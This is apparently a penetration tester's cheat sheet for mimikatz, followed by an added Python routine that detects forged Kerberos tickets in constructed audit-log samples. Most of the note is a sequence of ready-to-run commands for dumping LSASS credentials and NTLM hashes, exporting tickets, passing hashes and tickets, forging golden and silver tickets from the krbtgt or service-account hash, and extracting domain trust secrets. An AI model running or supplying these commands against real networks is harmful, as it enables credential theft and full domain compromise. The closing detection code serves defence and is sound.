**Does not work with [[Evil-WinRM]]**

When mimikatz errors out because of a version mismatch, use the copy at `/usr/share/windows-resources/mimikatz/` on Kali.

```bash
privilege::debug
sekurlsa::credman
# or
privilege::debug
vault::cred
```

# Dump Hash

```powershell
privilege::debug
sekurlsa::logonpasswords
# msv: hashes used for local/domain authentication, e.g. NTLM
# wdigest: legacy provider that used to keep the plaintext password
# kerberos: Kerberos tickets/keys, or information related to tickets
# tspkg/ssp/credman/cloudap: results from other authentication providers or credential stores
# A name ending in $ is a computer account
# Same account but different hash values:
# values taken from different credential stores differ in representation and content.
# e.g. NTLM vs Kerberos session key
```

# Dump Tickets

```powershell
# you will need to run the command prompt as an administrator
# this will export all of the .kirbi tickets into the directory that you are in
# or you can also use the base64 encoded tickets from Rubeus
# when looking for which ticket to impersonate, it is recommended to look for an administrator ticket from the krbtgt
.\mimikatz
privilege::debug
sekurlsa::tickets /export
```

# Pass the Hash

```powershell
privilege::debug
sekurlsa::pth /user:Administrator /domain:<domain> /ntlm:<hash>
```

# Pass the Ticket

```powershell
.\mimikatz.exe
# the command will cache and impersonate the given ticket
kerberos::ptt <ticket>
# verify that we successfully impersonated the ticket by listing our cached tickets
klist
# verify that you can look at the admin share
dir \\<IP>\admin$
```

# Golden / Silver Ticket Attack

```powershell
# Golden ticket
.\mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /krbtgt:<NTLM> /id:500

# Silver ticket
.\mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:<service_account>
kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /rc4:<NTLM> /id:1105
# OR
kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /rc4:<NTLM> /id:1105 /ptt
misc::cmd
```

# Dump Trust Secrets

```bash
mimikatz.exe
lsadump::trust /patch
```
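Defender-side counterpart to the Golden / Silver Ticket section above, added here as an example and not part of the original note: a heuristic pass over Kerberos audit events (4768 TGT requested, 4769 service ticket requested) that flags a service ticket whose account never obtained a TGT from the KDC, which is what a forged TGT looks like from the domain controller's side, and service tickets encrypted with RC4-HMAC (0x17), since the commands above mint tickets from NTLM/RC4 keys. The `KerbEvent` schema and the sample events are constructed and simplified; this is not a parser for real EVTX files.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

AES256_CTS_HMAC_SHA1 = 0x12  # "Ticket Encryption Type" values as logged by Windows
RC4_HMAC = 0x17

@dataclass
class KerbEvent:
    """Simplified Security-log record (constructed schema, not raw EVTX)."""
    time: datetime
    event_id: int   # 4768 = TGT requested, 4769 = service ticket requested
    account: str    # TargetUserName
    service: str    # ServiceName ("krbtgt" for 4768)
    enc_type: int   # TicketEncryptionType

def find_suspicious(events, window=timedelta(hours=10)):
    """Return (account, service, reason) for each 4769 that trips a check.
    Check 1: no 4768 for the account within `window` (default is the usual
             10-hour TGT lifetime). A golden ticket is minted offline, so the
             KDC never logs a 4768 for it, yet 4769s appear when it is used.
    Check 2: service ticket encrypted with RC4-HMAC. Tickets forged from an
             NTLM/RC4 key default to this type and stand out in a domain
             that normally issues AES tickets.
    Note: a silver ticket goes straight to the service and never reaches the
    KDC, so it has to be hunted in the service host's own logs instead.
    """
    last_tgt = {}  # account -> time of the most recent 4768
    findings = []
    for e in sorted(events, key=lambda ev: ev.time):
        if e.event_id == 4768:
            last_tgt[e.account] = e.time
        elif e.event_id == 4769:
            tgt_time = last_tgt.get(e.account)
            if tgt_time is None or e.time - tgt_time > window:
                findings.append((e.account, e.service, "service ticket without recent TGT request"))
            if e.enc_type == RC4_HMAC:
                findings.append((e.account, e.service, "RC4-HMAC service ticket"))
    return findings

# Constructed sample: a normal logon by alice, then a 4769 for Administrator with no 4768 and an RC4 ticket.
T0 = datetime(2024, 1, 1, 9, 0)
SAMPLE_EVENTS = [
    KerbEvent(T0, 4768, "alice", "krbtgt", AES256_CTS_HMAC_SHA1),
    KerbEvent(T0 + timedelta(minutes=5), 4769, "alice", "cifs/fs01", AES256_CTS_HMAC_SHA1),
    KerbEvent(T0 + timedelta(minutes=30), 4769, "Administrator", "cifs/dc01", RC4_HMAC),
]

if __name__ == "__main__":
    for account, service, reason in find_suspicious(SAMPLE_EVENTS):
        print(f"{account} -> {service}: {reason}")
```

Both checks are heuristics: a TGT obtained before the log window opened, or a legitimately RC4-only service account, will also trip them, so treat hits as leads to correlate with logon and share-access events rather than as verdicts.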